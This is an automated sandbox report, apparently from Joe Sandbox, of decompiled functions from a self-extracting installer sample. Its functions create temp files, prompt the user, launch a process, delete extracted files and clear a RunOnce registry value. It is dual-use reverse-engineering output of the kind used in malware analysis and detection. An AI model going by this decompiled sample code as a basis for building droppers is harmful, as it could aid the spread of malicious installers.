                                                control_flow_graph 631 ac58c8-ac58d5 632 ac58d8-ac58dd 631->632 632->632 633 ac58df-ac58f1 LocalAlloc 632->633 634 ac5919-ac5959 call ac1680 call ac658a CreateFileA LocalFree 633->634 635 ac58f3-ac5901 call ac44b9 633->635 638 ac5906-ac5910 call ac6285 634->638 645 ac595b-ac596c CloseHandle GetFileAttributesA 634->645 635->638 644 ac5912-ac5918 638->644 645->638 646 ac596e-ac5970 645->646 646->638 647 ac5972-ac597b 646->647 647->644
                                                C-Code - Quality: 95%
                                                			E00AC58C8(intOrPtr* __ecx) {
                                                				void* _v8;
                                                				intOrPtr _t6;
                                                				void* _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                				signed char _t16;
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr* _t27;
                                                				CHAR* _t33;
                                                
                                                				_push(__ecx);
                                                				_t33 = __ecx;
                                                				_t27 = __ecx;
                                                				_t23 = __ecx + 1;
                                                				do {
                                                					_t6 =  *_t27;
                                                					_t27 = _t27 + 1;
                                                				} while (_t6 != 0);
                                                				_t36 = _t27 - _t23 + 0x14;
                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                				if(_t20 != 0) {
                                                					E00AC1680(_t20, _t36, _t33);
                                                					E00AC658A(_t20, _t36, "TMP4351$.TMP");
                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                					_v8 = _t10;
                                                					LocalFree(_t20);
                                                					_t12 = _v8;
                                                					if(_t12 == 0xffffffff) {
                                                						goto L4;
                                                					} else {
                                                						CloseHandle(_t12);
                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                							goto L4;
                                                						} else {
                                                							 *0xac9124 = 0;
                                                							_t14 = 1;
                                                						}
                                                					}
                                                				} else {
                                                					E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					L4:
                                                					 *0xac9124 = E00AC6285();
                                                					_t14 = 0;
                                                				}
                                                				return _t14;
                                                			}













                                                0x00ac58cd
                                                0x00ac58d1
                                                0x00ac58d3
                                                0x00ac58d5
                                                0x00ac58d8
                                                0x00ac58d8
                                                0x00ac58da
                                                0x00ac58db
                                                0x00ac58e1
                                                0x00ac58ed
                                                0x00ac58f1
                                                0x00ac591e
                                                0x00ac592c
                                                0x00ac5943
                                                0x00ac594a
                                                0x00ac594d
                                                0x00ac5953
                                                0x00ac5959
                                                0x00000000
                                                0x00ac595b
                                                0x00ac595c
                                                0x00ac5963
                                                0x00ac596c
                                                0x00000000
                                                0x00ac5972
                                                0x00ac5974
                                                0x00ac597a
                                                0x00ac597a
                                                0x00ac596c
                                                0x00ac58f3
                                                0x00ac5901
                                                0x00ac5906
                                                0x00ac590b
                                                0x00ac5910
                                                0x00ac5910
                                                0x00ac5918

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC58E7
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5943
                                                • LocalFree.KERNEL32(00000000,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC594D
                                                • CloseHandle.KERNEL32(00000000,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC595C
                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                • API String ID: 747627703-3451089282
                                                • Opcode ID: 10843a1c1153c386876259a5376fd3ec5e3713f93a5fd95ea9f9b95c8ec813c0
                                                • Instruction ID: f43505a9c1469fe0b67833a684fb1731466c8c9b64289f5c5bb5e5a8f9a3aa14
                                                • Opcode Fuzzy Hash: 10843a1c1153c386876259a5376fd3ec5e3713f93a5fd95ea9f9b95c8ec813c0
                                                • Instruction Fuzzy Hash: 0E112671B006146BC7249FBA5C4DFAB7E99EF8A364B160659F506D3181CA70984686A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 675 ac3fef-ac4010 676 ac410a-ac411a call ac6ce0 675->676 677 ac4016-ac403b CreateProcessA 675->677 678 ac40c4-ac4101 call ac6285 GetLastError FormatMessageA call ac44b9 677->678 679 ac4041-ac406e WaitForSingleObject GetExitCodeProcess 677->679 693 ac4106 678->693 682 ac4070-ac4077 679->682 683 ac4091 call ac411b 679->683 682->683 686 ac4079-ac407b 682->686 688 ac4096-ac40b8 CloseHandle * 2 683->688 686->683 690 ac407d-ac4089 686->690 691 ac4108 688->691 692 ac40ba-ac40c0 688->692 690->683 694 ac408b 690->694 691->676 692->691 695 ac40c2 692->695 693->691 694->683 695->693
                                                C-Code - Quality: 84%
                                                			E00AC3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                				signed int _v8;
                                                				char _v524;
                                                				long _v528;
                                                				struct _PROCESS_INFORMATION _v544;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t20;
                                                				void* _t22;
                                                				int _t25;
                                                				intOrPtr* _t39;
                                                				signed int _t44;
                                                				void* _t49;
                                                				signed int _t50;
                                                				intOrPtr _t53;
                                                
                                                				_t45 = __edx;
                                                				_t20 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t20 ^ _t50;
                                                				_t39 = __ecx;
                                                				_t49 = 1;
                                                				_t22 = 0;
                                                				if(__ecx == 0) {
                                                					L13:
                                                					return E00AC6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                				}
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                				if(_t25 == 0) {
                                                					 *0xac9124 = E00AC6285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                					_t45 = 0x4c4;
                                                					E00AC44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                					L11:
                                                					_t49 = 0;
                                                					L12:
                                                					_t22 = _t49;
                                                					goto L13;
                                                				}
                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                				_t44 = _v528;
                                                				_t53 =  *0xac8a28; // 0x0
                                                				if(_t53 == 0) {
                                                					_t34 =  *0xac9a2c; // 0x0
                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                						_t34 = _t44 & 0xff000000;
                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                							 *0xac9a2c = _t44;
                                                						}
                                                					}
                                                				}
                                                				E00AC411B(_t34, _t44);
                                                				CloseHandle(_v544.hThread);
                                                				CloseHandle(_v544);
                                                				if(( *0xac9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}


















                                                0x00ac3fef
                                                0x00ac3ffa
                                                0x00ac4001
                                                0x00ac4008
                                                0x00ac400a
                                                0x00ac400b
                                                0x00ac4010
                                                0x00ac410a
                                                0x00ac411a
                                                0x00ac411a
                                                0x00ac401c
                                                0x00ac401d
                                                0x00ac401e
                                                0x00ac401f
                                                0x00ac4033
                                                0x00ac403b
                                                0x00ac40ca
                                                0x00ac40e9
                                                0x00ac40f8
                                                0x00ac4101
                                                0x00ac4106
                                                0x00ac4106
                                                0x00ac4108
                                                0x00ac4108
                                                0x00000000
                                                0x00ac4108
                                                0x00ac4049
                                                0x00ac405c
                                                0x00ac4062
                                                0x00ac4068
                                                0x00ac406e
                                                0x00ac4070
                                                0x00ac4077
                                                0x00ac407f
                                                0x00ac4089
                                                0x00ac408b
                                                0x00ac408b
                                                0x00ac4089
                                                0x00ac4077
                                                0x00ac4091
                                                0x00ac409c
                                                0x00ac40a8
                                                0x00ac40b8
                                                0x00000000
                                                0x00ac40c2
                                                0x00000000
                                                0x00ac40c2

                                                APIs
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00AC4033
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AC4049
                                                • GetExitCodeProcess.KERNELBASE ref: 00AC405C
                                                • CloseHandle.KERNEL32(?), ref: 00AC409C
                                                • CloseHandle.KERNEL32(?), ref: 00AC40A8
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00AC40DC
                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00AC40E9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                • String ID:
                                                • API String ID: 3183975587-0
                                                • Opcode ID: 0eac62b6d62a9c6ab2d61d592a76adf3f094cedb6bb6e0c2db703696c977db61
                                                • Instruction ID: 1a9065d776a429bb560bfdffe96307d67e66c9a7b75416ecdf4e32abff0044ed
                                                • Opcode Fuzzy Hash: 0eac62b6d62a9c6ab2d61d592a76adf3f094cedb6bb6e0c2db703696c977db61
                                                • Instruction Fuzzy Hash: FE31C23168021CABEB20DBA5DC4DFBB777CEBA8744F1202ADF545D2161CA344D82CB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC51E5(void* __eflags) {
                                                				int _t5;
                                                				void* _t6;
                                                				void* _t28;
                                                
                                                				_t1 = E00AC468F("UPROMPT", 0, 0) + 1; // 0x1
                                                				_t28 = LocalAlloc(0x40, _t1);
                                                				if(_t28 != 0) {
                                                					if(E00AC468F("UPROMPT", _t28, _t29) != 0) {
                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                						if(_t5 != 0) {
                                                							_t6 = E00AC44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                							LocalFree(_t28);
                                                							if(_t6 != 6) {
                                                								 *0xac9124 = 0x800704c7;
                                                								L10:
                                                								return 0;
                                                							}
                                                							 *0xac9124 = 0;
                                                							L6:
                                                							return 1;
                                                						}
                                                						LocalFree(_t28);
                                                						goto L6;
                                                					}
                                                					E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree(_t28);
                                                					 *0xac9124 = 0x80070714;
                                                					goto L10;
                                                				}
                                                				E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0xac9124 = E00AC6285();
                                                				goto L10;
                                                			}






                                                0x00ac51fb
                                                0x00ac5207
                                                0x00ac520b
                                                0x00ac523c
                                                0x00ac5268
                                                0x00ac5270
                                                0x00ac528b
                                                0x00ac5293
                                                0x00ac529c
                                                0x00ac52a6
                                                0x00ac52b0
                                                0x00000000
                                                0x00ac52b0
                                                0x00ac529e
                                                0x00ac5279
                                                0x00000000
                                                0x00ac527b
                                                0x00ac5273
                                                0x00000000
                                                0x00ac5273
                                                0x00ac524a
                                                0x00ac5250
                                                0x00ac5256
                                                0x00000000
                                                0x00ac5256
                                                0x00ac5219
                                                0x00ac5223
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F4D,?,00000002,00000000), ref: 00AC5201
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00AC5250
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                  • Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$UPROMPT
                                                • API String ID: 957408736-2980973527
                                                • Opcode ID: 3fe15988c82bd2b00648e72ef6bf96e9eb404b6b4ec0b9fcad7ff46ef644c9b8
                                                • Instruction ID: 0a0a48e803b9407346c27d30807ecc695a9b80c47840f4012c034fdea17b6cab
                                                • Opcode Fuzzy Hash: 3fe15988c82bd2b00648e72ef6bf96e9eb404b6b4ec0b9fcad7ff46ef644c9b8
                                                • Instruction Fuzzy Hash: 371108B1B00A05AFE354ABB15E5AF7B61DDDB99384F17442DF602E5190DB789C024228
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E00AC52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t9;
                                                				signed int _t11;
                                                				void* _t21;
                                                				void* _t29;
                                                				CHAR** _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t28 = __edi;
                                                				_t22 = __ecx;
                                                				_t21 = __ebx;
                                                				_t9 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t9 ^ _t33;
                                                				_push(__esi);
                                                				_t31 =  *0xac91e0; // 0x2eb7b60
                                                				if(_t31 != 0) {
                                                					_push(__edi);
                                                					do {
                                                						_t29 = _t31;
                                                						if( *0xac8a24 == 0 &&  *0xac9a30 == 0) {
                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                							DeleteFileA( *_t31); // executed
                                                						}
                                                						_t31 = _t31[1];
                                                						LocalFree( *_t29);
                                                						LocalFree(_t29);
                                                					} while (_t31 != 0);
                                                					_pop(_t28);
                                                				}
                                                				_t11 =  *0xac8a20; // 0x0
                                                				_pop(_t32);
                                                				if(_t11 != 0 &&  *0xac8a24 == 0 &&  *0xac9a30 == 0) {
                                                					_push(_t22);
                                                					E00AC1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                					if(( *0xac9a34 & 0x00000020) != 0) {
                                                						E00AC65E8( &_v268);
                                                					}
                                                					SetCurrentDirectoryA(".."); // executed
                                                					_t22 =  &_v268;
                                                					E00AC2390( &_v268);
                                                					_t11 =  *0xac8a20; // 0x0
                                                				}
                                                				if( *0xac9a40 != 1 && _t11 != 0) {
                                                					_t11 = E00AC1FE1(_t22); // executed
                                                				}
                                                				 *0xac8a20 =  *0xac8a20 & 0x00000000;
                                                				return E00AC6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                			}












                                                0x00ac52b6
                                                0x00ac52b6
                                                0x00ac52b6
                                                0x00ac52c1
                                                0x00ac52c8
                                                0x00ac52cb
                                                0x00ac52cc
                                                0x00ac52d4
                                                0x00ac52d6
                                                0x00ac52d7
                                                0x00ac52de
                                                0x00ac52e0
                                                0x00ac52f2
                                                0x00ac52fa
                                                0x00ac52fa
                                                0x00ac5302
                                                0x00ac5305
                                                0x00ac530c
                                                0x00ac5312
                                                0x00ac5316
                                                0x00ac5316
                                                0x00ac5317
                                                0x00ac531c
                                                0x00ac531f
                                                0x00ac5333
                                                0x00ac5345
                                                0x00ac5351
                                                0x00ac5359
                                                0x00ac5359
                                                0x00ac5363
                                                0x00ac5369
                                                0x00ac536f
                                                0x00ac5374
                                                0x00ac5374
                                                0x00ac5381
                                                0x00ac5387
                                                0x00ac5387
                                                0x00ac538f
                                                0x00ac53a0

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(02EB7B60,00000080,?,00000000), ref: 00AC52F2
                                                • DeleteFileA.KERNELBASE(02EB7B60), ref: 00AC52FA
                                                • LocalFree.KERNEL32(02EB7B60,?,00000000), ref: 00AC5305
                                                • LocalFree.KERNEL32(02EB7B60), ref: 00AC530C
                                                • SetCurrentDirectoryA.KERNELBASE(00AC11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC5363
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC5334
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                • API String ID: 2833751637-183442868
                                                • Opcode ID: 307470e3ee00aae4041a33dbf3cf524113d25632452c704651ebeffebcb0e5c4
                                                • Instruction ID: f8586b51083eddbe22e57fbe793ba10f100e0147f2a8eff02ce3c605939c3960
                                                • Opcode Fuzzy Hash: 307470e3ee00aae4041a33dbf3cf524113d25632452c704651ebeffebcb0e5c4
                                                • Instruction Fuzzy Hash: 1C218E31900648DFDB20DBA4DD19F6A77A4BB107D4F07015DF4465A2A0CFB8AC86CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC1FE1(void* __ecx) {
                                                				void* _v8;
                                                				long _t4;
                                                
                                                				if( *0xac8530 != 0) {
                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                					if(_t4 == 0) {
                                                						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                						return RegCloseKey(_v8);
                                                					}
                                                				}
                                                				return _t4;
                                                			}





                                                0x00ac1fee
                                                0x00ac2005
                                                0x00ac200d
                                                0x00ac2017
                                                0x00000000
                                                0x00ac2020
                                                0x00ac200d
                                                0x00ac2029

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00AC538C,?,?,00AC538C), ref: 00AC2005
                                                • RegDeleteValueA.KERNELBASE(00AC538C,wextract_cleanup2,?,?,00AC538C), ref: 00AC2017
                                                • RegCloseKey.ADVAPI32(00AC538C,?,?,00AC538C), ref: 00AC2020
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                • API String ID: 849931509-3354236729
                                                • Opcode ID: 72881697644a1ee5cbbc109cad988d47e78859681c453252b71a6ade8794dab2
                                                • Instruction ID: aa4ac9cb7150ec47cc7752c60fe2fec61e9068101b0387caab0cd287b2cdb017
                                                • Opcode Fuzzy Hash: 72881697644a1ee5cbbc109cad988d47e78859681c453252b71a6ade8794dab2
                                                • Instruction Fuzzy Hash: 2FE04630A5031CBBEB21CBE4EC0AF697B29FB10B85F120199BA05A00A1EBA55E15D706
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00AC4CD0(char* __edx, long _a4, int _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t30;
                                                				long _t32;
                                                				signed int _t33;
                                                				long _t35;
                                                				long _t36;
                                                				struct HWND__* _t37;
                                                				long _t38;
                                                				long _t39;
                                                				long _t41;
                                                				long _t44;
                                                				long _t45;
                                                				long _t46;
                                                				signed int _t50;
                                                				long _t51;
                                                				char* _t58;
                                                				long _t59;
                                                				char* _t63;
                                                				long _t64;
                                                				CHAR* _t71;
                                                				CHAR* _t74;
                                                				int _t75;
                                                				signed int _t76;
                                                
                                                				_t69 = __edx;
                                                				_t29 =  *0xac8004; // 0xc32e3ded
                                                				_t30 = _t29 ^ _t76;
                                                				_v8 = _t30;
                                                				_t75 = _a8;
                                                				if( *0xac91d8 == 0) {
                                                					_t32 = _a4;
                                                					__eflags = _t32;
                                                					if(_t32 == 0) {
                                                						_t33 = E00AC4E99(_t75);
                                                						L35:
                                                						return E00AC6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                					}
                                                					_t35 = _t32 - 1;
                                                					__eflags = _t35;
                                                					if(_t35 == 0) {
                                                						L9:
                                                						_t33 = 0;
                                                						goto L35;
                                                					}
                                                					_t36 = _t35 - 1;
                                                					__eflags = _t36;
                                                					if(_t36 == 0) {
                                                						_t37 =  *0xac8584; // 0x0
                                                						__eflags = _t37;
                                                						if(_t37 != 0) {
                                                							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                						}
                                                						_t54 = 0xac91e4;
                                                						_t58 = 0xac91e4;
                                                						do {
                                                							_t38 =  *_t58;
                                                							_t58 =  &(_t58[1]);
                                                							__eflags = _t38;
                                                						} while (_t38 != 0);
                                                						_t59 = _t58 - 0xac91e5;
                                                						__eflags = _t59;
                                                						_t71 =  *(_t75 + 4);
                                                						_t73 =  &(_t71[1]);
                                                						do {
                                                							_t39 =  *_t71;
                                                							_t71 =  &(_t71[1]);
                                                							__eflags = _t39;
                                                						} while (_t39 != 0);
                                                						_t69 = _t71 - _t73;
                                                						_t30 = _t59 + 1 + _t71 - _t73;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							L3:
                                                							_t33 = _t30 | 0xffffffff;
                                                							goto L35;
                                                						}
                                                						_t69 = 0xac91e4;
                                                						_t30 = E00AC4702( &_v268, 0xac91e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(__eflags == 0) {
                                                							goto L3;
                                                						}
                                                						_t41 = E00AC476D( &_v268, __eflags);
                                                						__eflags = _t41;
                                                						if(_t41 == 0) {
                                                							goto L9;
                                                						}
                                                						_push(0x180);
                                                						_t30 = E00AC4980( &_v268, 0x8302); // executed
                                                						_t75 = _t30;
                                                						__eflags = _t75 - 0xffffffff;
                                                						if(_t75 == 0xffffffff) {
                                                							goto L3;
                                                						}
                                                						_t30 = E00AC47E0( &_v268);
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						 *0xac93f4 =  *0xac93f4 + 1;
                                                						_t33 = _t75;
                                                						goto L35;
                                                					}
                                                					_t44 = _t36 - 1;
                                                					__eflags = _t44;
                                                					if(_t44 == 0) {
                                                						_t54 = 0xac91e4;
                                                						_t63 = 0xac91e4;
                                                						do {
                                                							_t45 =  *_t63;
                                                							_t63 =  &(_t63[1]);
                                                							__eflags = _t45;
                                                						} while (_t45 != 0);
                                                						_t74 =  *(_t75 + 4);
                                                						_t64 = _t63 - 0xac91e5;
                                                						__eflags = _t64;
                                                						_t69 =  &(_t74[1]);
                                                						do {
                                                							_t46 =  *_t74;
                                                							_t74 =  &(_t74[1]);
                                                							__eflags = _t46;
                                                						} while (_t46 != 0);
                                                						_t73 = _t74 - _t69;
                                                						_t30 = _t64 + 1 + _t74 - _t69;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							goto L3;
                                                						}
                                                						_t69 = 0xac91e4;
                                                						_t30 = E00AC4702( &_v268, 0xac91e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                						_t30 = E00AC4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						E00AC4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                						__eflags = _t50;
                                                						if(_t50 != 0) {
                                                							_t51 = _t50 & 0x00000027;
                                                							__eflags = _t51;
                                                						} else {
                                                							_t51 = 0x80;
                                                						}
                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						} else {
                                                							_t33 = 1;
                                                							goto L35;
                                                						}
                                                					}
                                                					_t30 = _t44 - 1;
                                                					__eflags = _t30;
                                                					if(_t30 == 0) {
                                                						goto L3;
                                                					}
                                                					goto L9;
                                                				}
                                                				if(_a4 == 3) {
                                                					_t30 = E00AC4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                				}
                                                				goto L3;
                                                			}































                                                0x00ac4cd0
                                                0x00ac4cdb
                                                0x00ac4ce0
                                                0x00ac4ce2
                                                0x00ac4cee
                                                0x00ac4cf2
                                                0x00ac4d0e
                                                0x00ac4d0e
                                                0x00ac4d11
                                                0x00ac4e83
                                                0x00ac4e88
                                                0x00ac4e98
                                                0x00ac4e98
                                                0x00ac4d17
                                                0x00ac4d17
                                                0x00ac4d1a
                                                0x00ac4d2f
